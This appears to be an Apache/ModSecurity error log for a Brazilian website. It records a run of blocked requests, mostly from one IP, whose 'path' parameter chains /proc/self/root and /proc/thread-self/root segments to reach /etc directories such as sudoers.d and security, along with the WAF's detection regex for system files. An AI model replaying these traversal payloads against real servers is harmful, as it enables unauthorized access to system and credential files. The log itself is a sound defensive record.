[Mon Mar 16 18:57:02.694558 2026] [:error] [pid 15568:tid 140411616036608] [client 74.7.241.46:50524] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh8raQpVkWug9HeOt9VrwAAA08"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:57:04.034613 2026] [:error] [pid 14895:tid 140411725141760] [client 74.7.241.46:50530] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh8sFajLEzk2WiQ-100YgAAAoI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:57:05.306935 2026] [:error] [pid 15568:tid 140411708356352] [client 74.7.241.46:50532] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh8saQpVkWug9HeOt9VsAAAA0Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:57:06.647002 2026] [:error] [pid 21806:tid 140411708356352] [client 74.7.228.16:52608] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abh8stSswJuvopo3lOiCAgAAAIQ"]
[Mon Mar 16 18:57:06.674452 2026] [:error] [pid 15568:tid 140411599251200] [client 74.7.241.46:50548] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh8sqQpVkWug9HeOt9VsQAAA1E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:57:07.819010 2026] [:error] [pid 21806:tid 140411574073088] [client 74.7.241.46:50552] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh8s9SswJuvopo3lOiCBAAAAJQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:57:09.122166 2026] [:error] [pid 10772:tid 140411733534464] [client 74.7.241.46:57592] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh8tf9ocpUE4ed4uDwVtgAAAgE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:57:10.300037 2026] [:error] [pid 10831:tid 140411699963648] [client 74.7.241.46:57600] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh8to6lpbStxTqkSkuKagAAAkU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:57:12.999727 2026] [:error] [pid 10772:tid 140411691570944] [client 74.7.241.46:57606] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh8uP9ocpUE4ed4uDwVuwAAAgY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:57:15.642863 2026] [:error] [pid 29802:tid 140411691570944] [client 74.7.241.46:57612] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh8us_BxrYCr4hPDw8MXgAAAcY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:57:18.011054 2026] [:error] [pid 15061:tid 140411607643904] [client 74.7.241.46:57620] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh8vqTCbgAP5jq5TehM2AAAAtA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:57:19.332932 2026] [:error] [pid 14895:tid 140411607643904] [client 74.7.241.46:59204] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh8v1ajLEzk2WiQ-100ZgAAApA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:57:20.547790 2026] [:error] [pid 14895:tid 140411590858496] [client 74.7.241.46:59210] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh8wFajLEzk2WiQ-100ZwAAApI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:57:21.870986 2026] [:error] [pid 14895:tid 140411624429312] [client 74.7.241.46:59216] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh8wVajLEzk2WiQ-100agAAAo4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:57:23.030253 2026] [:error] [pid 10651:tid 140411725141760] [client 74.7.243.203:40164] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh8w7ysWC90G-1nBrBnbQAAAYI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:57:24.278100 2026] [:error] [pid 29802:tid 140411565680384] [client 74.7.241.46:59228] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh8xM_BxrYCr4hPDw8MYQAAAdU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:57:25.591152 2026] [:error] [pid 21806:tid 140411658000128] [client 74.7.241.46:59244] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh8xdSswJuvopo3lOiCBwAAAIo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:57:26.807035 2026] [:error] [pid 21805:tid 140411641214720] [client 74.7.241.46:59252] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh8xrABkC4fWIHEf8EaQgAAAEw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:57:29.922413 2026] [:error] [pid 15568:tid 140411733534464] [client 74.7.241.46:59760] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh8yaQpVkWug9HeOt9VugAAA0E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:57:32.202455 2026] [:error] [pid 21806:tid 140411691570944] [client 74.7.241.46:59766] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh8y9SswJuvopo3lOiCCAAAAIY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:57:33.529340 2026] [:error] [pid 10831:tid 140411590858496] [client 74.7.241.46:59782] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh8zY6lpbStxTqkSkuKbgAAAlI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:57:34.722333 2026] [:error] [pid 10651:tid 140411649607424] [client 74.7.241.46:59792] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh8zrysWC90G-1nBrBndgAAAYs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:57:36.030156 2026] [:error] [pid 10651:tid 140411582465792] [client 74.7.241.46:59798] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] 